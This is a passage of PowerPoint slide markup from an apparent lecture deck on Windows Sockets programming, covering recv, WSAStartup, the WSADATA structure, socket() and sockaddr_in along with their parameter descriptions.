                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="4944110" y="1448435"/>
            <a:ext cx="6443980" cy="1828800"/>
            <a:chOff x="8860" y="2520"/>
            <a:chExt cx="10148" cy="2880"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="圆角矩形标注 3"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8860" y="2520"/>
              <a:ext cx="10149" cy="2881"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -62947"/>
                <a:gd name="adj2" fmla="val 711"/>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8874" y="2798"/>
              <a:ext cx="10122" cy="2325"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr marL="720090" indent="-539750" algn="l" fontAlgn="auto">
                <a:buSzPct val="150000"/>
                <a:buBlip>
                  <a:blip r:embed="rId5"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3000">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>The recv function receives data from a connected socket or a bound connectionless socket.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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WSADATA </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14325" y="4596130"/>
            <a:ext cx="7912735" cy="1783715"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="6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wVersion</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version of the Windows Sockets specification that the Ws2_32.dll expects the caller to use.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="6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wHighVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</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highest version of the Windows Sockets specification that the Ws2_32.dll can support.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="60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iMaxSockets</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maximum number of sockets that may be opened.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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361315" y="1045210"/>
            <a:ext cx="6370955" cy="3476625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>typedef struct WSAData {</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WORD           wVersion;</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WORD           wHighVersion;</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unsigned short iMaxSockets;</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unsigned short iMaxUdpDg;</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*lpVendorInfo;</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szDescription[WSADESCRIPTION_LEN + 1];</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szSystemStatus[WSASYS_STATUS_LEN + 1];</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szDescription[WSADESCRIPTION_LEN + 1];</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*lpVendorInfo;</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WSADATA;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="7324090" y="1484630"/>
            <a:ext cx="4507230" cy="2598420"/>
            <a:chOff x="8867" y="2520"/>
            <a:chExt cx="10122" cy="2598"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形标注 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8960" y="2520"/>
              <a:ext cx="9936" cy="2598"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -63207"/>
                <a:gd name="adj2" fmla="val -3641"/>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8867" y="2730"/>
              <a:ext cx="10122" cy="2245"/>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WSADATA structure contains information about the Windows Sockets implementation.</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WSADATA </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14325" y="4520565"/>
            <a:ext cx="10794365" cy="1892935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="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iMaxUdpDg</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The maximum datagram message size.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="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lpVendorInfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</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pointer to vendor-specific information.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="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rPr>
              <a:t>szDescription[WSADESCRIPTION_LEN + 1]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">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 NULL-terminated ASCII string into which the Ws2_32.dll copies a description of the Windows Sockets implementation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="07A7AF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>szSystemStatus[WSASYS_STATUS_LEN + 1]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>A NULL-terminated ASCII string into which the Ws2_32.dll copies relevant status or configuration information.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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361315" y="1045210"/>
            <a:ext cx="6370955" cy="3476625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>typedef struct WSAData {</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WORD           wVersion;</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WORD           wHighVersion;</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unsigned short iMaxSockets;</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unsigned short iMaxUdpDg;</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*lpVendorInfo;</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szDescription[WSADESCRIPTION_LEN + 1];</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szSystemStatus[WSASYS_STATUS_LEN + 1];</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szDescription[WSADESCRIPTION_LEN + 1];</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*lpVendorInfo;</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WSADATA;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="7324090" y="1484630"/>
            <a:ext cx="4507230" cy="2598420"/>
            <a:chOff x="8867" y="2520"/>
            <a:chExt cx="10122" cy="2598"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="圆角矩形标注 3"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8960" y="2520"/>
              <a:ext cx="9936" cy="2598"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -63207"/>
                <a:gd name="adj2" fmla="val -3641"/>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8867" y="2730"/>
              <a:ext cx="10122" cy="2245"/>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WSADATA structure contains information about the Windows Sockets implementation.</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WSAStartup</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14325" y="4591685"/>
            <a:ext cx="10895330" cy="1168400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="07A7AF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>[out] lpWSAData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>A pointer to the WSADATA data structure that is to receive details of the Windows Sockets implementation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Box 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="133350" y="1450340"/>
            <a:ext cx="4541520" cy="2527935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="180000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>int WSAStartup(</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="180000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>        WORD      wVersionRequired,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="180000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>       [out] LPWSADATA lpWSAData</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="180000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="5019040" y="1239520"/>
            <a:ext cx="7039610" cy="2948940"/>
            <a:chOff x="6957" y="1697"/>
            <a:chExt cx="11086" cy="4644"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="圆角矩形标注 5"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6957" y="1697"/>
              <a:ext cx="11086" cy="4644"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -54861"/>
                <a:gd name="adj2" fmla="val -1722"/>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7149" y="1912"/>
              <a:ext cx="10702" cy="4215"/>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WSAStartup function initiates the use of the Windows Sockets DLL by a process. </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>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WSAStartup function returns a pointer to the WSADATA structure in the lpWSAData parameter.</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socket</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14325" y="4132580"/>
            <a:ext cx="11064240" cy="2104390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="6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[in] af</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The address family specification. The values currently supported are AF_INET or AF_INET6, which are the Internet address family formats for IPv4 and IPv6.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="6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[in] type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</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The type specification for the new socket. For more information, go to the link.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="6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[in] protocol</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The protocol to be used. The possible options for the protocol parameter are specific to the address family and socket type specified.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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1247775" y="1283970"/>
            <a:ext cx="3738880" cy="2489200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>SOCKET WSAAPI socket(</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int af,</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int type,</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int protocol</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="6436995" y="1229360"/>
            <a:ext cx="4507230" cy="2598420"/>
            <a:chOff x="8867" y="2520"/>
            <a:chExt cx="10122" cy="2598"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="圆角矩形标注 3"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8960" y="2520"/>
              <a:ext cx="9936" cy="2598"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -82611"/>
                <a:gd name="adj2" fmla="val -1906"/>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8867" y="2730"/>
              <a:ext cx="10122" cy="2245"/>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socket function creates a socket that is bound to a specific transport service provider.</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sockaddr_in</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14325" y="4366260"/>
            <a:ext cx="10694035" cy="2073275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5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sin_family</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The address family for the transport address. This member should always be set to AF_INET.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5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sin_port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</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A transport protocol port number.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5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sin_addr</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An IN_ADDR structure that contains an IPv4 transport address.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sin_zero[8]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Reserved for system use. A WSK application should set the contents of this array to zero.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Box 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="393065" y="1045210"/>
            <a:ext cx="4506595" cy="3169285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>typedef struct sockaddr_in {</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#if ...</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short          sin_family;</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#else</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ADDRESS_FAMILY sin_family;</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#endif</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USHORT         sin_port;</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IN_ADDR        sin_addr;</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CHAR           sin_zero[8];</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
